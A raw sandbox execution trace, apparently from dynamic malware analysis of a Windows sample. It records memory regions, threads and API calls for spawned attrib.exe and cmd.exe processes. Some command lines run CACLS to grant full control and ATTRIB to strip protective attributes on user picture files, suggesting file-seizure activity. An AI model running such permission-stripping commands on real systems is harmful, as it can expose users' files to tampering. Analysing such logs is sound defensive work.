Region: id = 26578 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26579 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26580 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26581 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26582 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26583 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 26584 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 26585 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26586 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26587 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26588 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = 
"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26589 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26590 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26591 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 539 os_tid = 0xeec Thread: id = 540 os_tid = 0xe10 Process: id = "378" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0x8a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "376" os_parent_pid = "0xe9c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26592 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26593 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26594 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type 
= pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26595 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 26596 start_va = 0x560000 end_va = 0x566fff entry_point = 0x560000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26597 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26598 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26599 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26600 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 26601 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26602 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26603 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26604 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26605 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = 
"private_0x00000000001e0000" filename = "" Region: id = 26606 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 26607 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26608 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26609 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26610 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26611 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26612 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26613 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26614 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 26615 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26616 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26617 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26618 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26619 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 26620 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26621 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 541 os_tid = 0x8b0 Process: id = "379" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xdac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All 
Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26622 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26623 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26624 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26625 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 26626 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26627 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26628 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26629 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26630 
start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 26631 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26632 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26633 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26634 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26635 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 26636 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 26637 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26638 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26639 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26640 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 26641 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26642 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26643 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26644 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26645 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26646 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 26647 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26648 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26649 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26650 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" 
filename = "" Region: id = 26651 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26652 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26653 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 26654 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 26655 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 26656 start_va = 0x13b0000 end_va = 0x167efff entry_point = 0x13b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 542 os_tid = 0x8fc [0186.005] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fc74 | out: lpSystemTimeAsFileTime=0x20fc74*(dwLowDateTime=0xa3c49880, dwHighDateTime=0x1d440a9)) [0186.005] GetCurrentProcessId () returned 0xdac [0186.005] GetCurrentThreadId () returned 0x8fc [0186.005] GetTickCount () returned 0x35282 [0186.005] QueryPerformanceCounter (in: lpPerformanceCount=0x20fc6c | out: lpPerformanceCount=0x20fc6c*=24279407497) returned 1 [0186.005] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0186.005] __set_app_type (_Type=0x1) [0186.005] __p__fmode () returned 0x76b331f4 [0186.006] __p__commode () returned 0x76b331fc [0186.006] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0186.006] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0186.006] 
GetCurrentThreadId () returned 0x8fc [0186.006] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8fc) returned 0x38 [0186.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.006] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0186.006] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.006] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0186.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fc04 | out: phkResult=0x20fc04*=0x0) returned 0x2 [0186.006] VirtualQuery (in: lpAddress=0x20fc3b, lpBuffer=0x20fbd4, dwLength=0x1c | out: lpBuffer=0x20fbd4*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.006] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fbd4, dwLength=0x1c | out: lpBuffer=0x20fbd4*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0186.006] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fbd4, dwLength=0x1c | out: lpBuffer=0x20fbd4*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0186.006] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fbd4, dwLength=0x1c | out: lpBuffer=0x20fbd4*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.006] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fbd4, dwLength=0x1c | out: lpBuffer=0x20fbd4*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0186.006] 
GetConsoleOutputCP () returned 0x1b5 [0186.006] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.007] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0186.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.007] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0186.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.007] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.007] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.007] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.007] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.007] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.007] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0186.007] GetEnvironmentStringsW () returned 0x290308* [0186.008] FreeEnvironmentStringsW (penv=0x290308) returned 1 [0186.008] GetEnvironmentStringsW () returned 0x290308* [0186.008] FreeEnvironmentStringsW (penv=0x290308) returned 1 [0186.008] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eb74 | out: phkResult=0x20eb74*=0x40) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0xb8, lpcbData=0x20eb78*=0x1000) returned 0x2 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x1, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: 
lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0x1, lpcbData=0x20eb78*=0x1000) returned 0x2 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x0, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x40, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x40, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0x40, lpcbData=0x20eb78*=0x1000) returned 0x2 [0186.008] RegCloseKey (hKey=0x40) returned 0x0 [0186.008] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eb74 | out: phkResult=0x20eb74*=0x40) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0x40, lpcbData=0x20eb78*=0x1000) returned 0x2 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x1, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0x1, lpcbData=0x20eb78*=0x1000) 
returned 0x2 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x0, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x9, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x4, lpData=0x20eb80*=0x9, lpcbData=0x20eb78*=0x4) returned 0x0 [0186.008] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eb7c, lpData=0x20eb80, lpcbData=0x20eb78*=0x1000 | out: lpType=0x20eb7c*=0x0, lpData=0x20eb80*=0x9, lpcbData=0x20eb78*=0x1000) returned 0x2 [0186.008] RegCloseKey (hKey=0x40) returned 0x0 [0186.008] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886394 [0186.009] srand (_Seed=0x5b886394) [0186.009] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"" [0186.009] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"" [0186.009] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.009] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x291a68, nSize=0x104 | out: 
lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0186.009] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.009] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.009] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.009] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0186.009] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0186.009] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0186.009] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0186.009] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0186.009] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0186.009] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0186.009] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0186.009] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0186.010] GetEnvironmentStringsW () returned 0x292458* [0186.010] FreeEnvironmentStringsW (penv=0x292458) returned 1 [0186.010] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.010] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.010] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0186.010] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0186.010] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0186.010] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 
